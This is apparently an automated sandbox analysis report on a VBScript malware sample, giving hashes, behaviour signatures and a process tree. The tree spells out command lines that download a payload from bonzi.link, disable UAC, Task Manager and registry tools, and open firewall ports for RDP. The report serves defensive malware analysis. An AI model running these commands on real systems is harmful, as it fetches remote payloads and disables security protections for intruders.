Analysis
-
max time kernel
270s -
max time network
204s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 17:11
Static task
static1
Behavioral task
behavioral1
Sample
malware.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
malware.vbs
Resource
win10v2004-20240508-en
General
-
Target
malware.vbs
-
Size
7KB
-
MD5
6e0473af4fbc9223bb02c4cbbad2ae4e
-
SHA1
e710bf9f0dc329d34644f869d580eb378bf179ec
-
SHA256
c7c562faf05a37549c96db450594051b30e2f4fc3010918e25d198ad028f1b1f
-
SHA512
e0de847f7fe1c0965cc1d2bb019441b7cd05890ba3d19c618a396de334e58dcca2fd5867756fb2f9d80d06f6fd85fc13f12c8c4855eb7844ff99bb3ca67a1444
-
SSDEEP
96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26I95F:qD8qrZgX7xrCdPidfbj26I9z
Malware Config
Extracted
http://bonzi.link/Bon.zip
Extracted
https://bonzi.link/Bon.zip
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 3212 bcdedit.exe 1704 bcdedit.exe 5924 bcdedit.exe 6024 bcdedit.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 35 4984 powershell.exe 40 5008 powershell.exe -
Creates new service(s) 2 TTPs
-
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 10 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 3128 netsh.exe 5492 netsh.exe 5688 netsh.exe 5792 netsh.exe 5624 netsh.exe 4436 netsh.exe 3024 netsh.exe 4228 netsh.exe 3848 netsh.exe 5560 netsh.exe -
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 5284 takeown.exe 5240 icacls.exe 1704 takeown.exe 3876 icacls.exe 1016 takeown.exe 5832 icacls.exe 5208 takeown.exe 5132 icacls.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 1016 takeown.exe 5832 icacls.exe 5208 takeown.exe 5132 icacls.exe 5284 takeown.exe 5240 icacls.exe 1704 takeown.exe 3876 icacls.exe -
Drops file in System32 directory 19 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db OpenWith.exe -
Drops file in Windows directory 1 IoCs
Processes:
netsh.exedescription ioc process File created C:\Windows\rescache\_merged\431186354\3486321857.pri netsh.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 3876 sc.exe 6028 sc.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 4984 powershell.exe 3136 powershell.exe 5008 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5644 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exepid process 4432 ipconfig.exe 5584 ipconfig.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 5500 taskkill.exe 5444 taskkill.exe 5588 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
cmd.exenetsh.exereg.exereg.exeOpenWith.exereg.exereg.exereg.exereg.exeOpenWith.exereg.exeOpenWith.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E44E9428-BDBC-4987-A099-40DC8FD255E7} {7F9185B0-CB92-43C5-80A9-92277A4F7B54} 0xFFFF = 010000000000000065b7250010aada01 cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9002 = "BranchCache - Hosted Cache Server (Uses HTTPS)" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8\@{Microsoft.Windows.SecureAssessmentBrowser_10.0.19041.1023_neutra = "Take a Test" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5366dd4697d\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableGPO = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9001 = "BranchCache - Peer Discovery (Uses WSD)" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" cmd.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8\@{Microsoft.XboxGameCallableUI_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy? = "Xbox Game UI" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8\@{Microsoft.Win32WebViewHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy?ms-reso = "Desktop App Web Viewer" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix cmd.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\International\sLanguage = "rus" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableGPO = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.ContentDeliveryManager_cw5n1h2txyewy%5Cresources.pri\1d5acddd82645c0\a01460c8\@{Microsoft.Windows.ContentDeliveryManager_10.0.19041.1023_neutral_ = "Microsoft Content" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36864 = "WLAN Service - WFD Application Services Platform Coordination Protocol (Uses UDP)" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36865 = "WLAN Service - WFD Services Kernel Mode Driver Rules" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache\en-US = "0c09" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%systemroot%\system32\provsvc.dll,-202 = "HomeGroup" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{4234D49B-0245-4DF3-B780-3893943456E1} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 010000000000000027f13f0010aada01 OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.CloudExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri netsh.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 4324 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exepid process 4984 powershell.exe 4984 powershell.exe 4984 powershell.exe 3136 powershell.exe 3136 powershell.exe 5008 powershell.exe 5008 powershell.exe 4020 msedge.exe 4020 msedge.exe 4128 msedge.exe 4128 msedge.exe 3084 identity_helper.exe 3084 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
msedge.exepid process 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeDebugPrivilege 4984 powershell.exe Token: SeDebugPrivilege 3136 powershell.exe Token: SeDebugPrivilege 5008 powershell.exe Token: SeShutdownPrivilege 1368 powercfg.exe Token: SeCreatePagefilePrivilege 1368 powercfg.exe Token: SeShutdownPrivilege 4204 powercfg.exe Token: SeCreatePagefilePrivilege 4204 powercfg.exe Token: SeShutdownPrivilege 4452 powercfg.exe Token: SeCreatePagefilePrivilege 4452 powercfg.exe Token: SeShutdownPrivilege 4220 powercfg.exe Token: SeCreatePagefilePrivilege 4220 powercfg.exe Token: SeDebugPrivilege 1128 whoami.exe Token: SeTakeOwnershipPrivilege 1704 takeown.exe Token: SeShutdownPrivilege 5224 powercfg.exe Token: SeCreatePagefilePrivilege 5224 powercfg.exe Token: SeShutdownPrivilege 5272 powercfg.exe Token: SeCreatePagefilePrivilege 5272 powercfg.exe Token: SeShutdownPrivilege 5328 powercfg.exe Token: SeCreatePagefilePrivilege 5328 powercfg.exe Token: SeShutdownPrivilege 5440 powercfg.exe Token: SeCreatePagefilePrivilege 5440 powercfg.exe Token: SeDebugPrivilege 5716 whoami.exe Token: SeTakeOwnershipPrivilege 1016 takeown.exe Token: SeTakeOwnershipPrivilege 5208 takeown.exe Token: SeTakeOwnershipPrivilege 5284 takeown.exe Token: SeDebugPrivilege 5444 taskkill.exe Token: SeDebugPrivilege 5588 taskkill.exe Token: SeDebugPrivilege 5500 taskkill.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe 4128 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exepid process 5668 OpenWith.exe 5776 OpenWith.exe 1212 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.execmd.exenet.exedescription pid process target process PID 4352 wrote to memory of 4984 4352 cmd.exe powershell.exe PID 4352 wrote to memory of 4984 4352 cmd.exe powershell.exe PID 4352 wrote to memory of 3136 4352 cmd.exe powershell.exe PID 4352 wrote to memory of 3136 4352 cmd.exe powershell.exe PID 4352 wrote to memory of 5008 4352 cmd.exe powershell.exe PID 4352 wrote to memory of 5008 4352 cmd.exe powershell.exe PID 2176 wrote to memory of 3388 2176 cmd.exe net.exe PID 2176 wrote to memory of 3388 2176 cmd.exe net.exe PID 3388 wrote to memory of 4476 3388 net.exe net1.exe PID 3388 wrote to memory of 4476 3388 net.exe net1.exe PID 2176 wrote to memory of 1368 2176 cmd.exe powercfg.exe PID 2176 wrote to memory of 1368 2176 cmd.exe powercfg.exe PID 2176 wrote to memory of 4204 2176 cmd.exe powercfg.exe PID 2176 wrote to memory of 4204 2176 cmd.exe powercfg.exe PID 2176 wrote to memory of 4452 2176 cmd.exe powercfg.exe PID 2176 wrote to memory of 4452 2176 cmd.exe powercfg.exe PID 2176 wrote to memory of 4220 2176 cmd.exe powercfg.exe PID 2176 wrote to memory of 4220 2176 cmd.exe powercfg.exe PID 2176 wrote to memory of 4436 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 4436 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 3128 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 3128 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 3024 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 3024 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 4228 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 4228 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 3848 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 3848 2176 cmd.exe netsh.exe PID 2176 wrote to memory of 4852 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4852 2176 cmd.exe reg.exe PID 2176 wrote to memory of 1708 2176 cmd.exe reg.exe PID 2176 wrote to memory of 1708 2176 cmd.exe reg.exe PID 2176 wrote to memory of 988 2176 cmd.exe reg.exe PID 2176 wrote to memory of 988 2176 cmd.exe reg.exe PID 2176 wrote to memory of 5088 2176 cmd.exe reg.exe PID 2176 wrote to memory of 5088 2176 cmd.exe reg.exe PID 2176 wrote to memory of 868 2176 cmd.exe reg.exe PID 2176 wrote to memory of 868 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4632 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4632 2176 cmd.exe reg.exe PID 2176 wrote to memory of 1484 2176 cmd.exe reg.exe PID 2176 wrote to memory of 1484 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4892 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4892 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4400 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4400 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4840 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4840 2176 cmd.exe reg.exe PID 2176 wrote to memory of 2864 2176 cmd.exe reg.exe PID 2176 wrote to memory of 2864 2176 cmd.exe reg.exe PID 2176 wrote to memory of 3656 2176 cmd.exe reg.exe PID 2176 wrote to memory of 3656 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4940 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4940 2176 cmd.exe reg.exe PID 2176 wrote to memory of 3460 2176 cmd.exe reg.exe PID 2176 wrote to memory of 3460 2176 cmd.exe reg.exe PID 2176 wrote to memory of 3960 2176 cmd.exe reg.exe PID 2176 wrote to memory of 3960 2176 cmd.exe reg.exe PID 2176 wrote to memory of 2236 2176 cmd.exe reg.exe PID 2176 wrote to memory of 2236 2176 cmd.exe reg.exe PID 2176 wrote to memory of 3244 2176 cmd.exe reg.exe PID 2176 wrote to memory of 3244 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4708 2176 cmd.exe reg.exe PID 2176 wrote to memory of 4708 2176 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\malware.bat1⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://bonzi.link/Bon.zip', 'Bon.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'BonziBuddy432.exe' -DestinationPath '.'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bonzi.link/Bon.zip', 'Bon.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
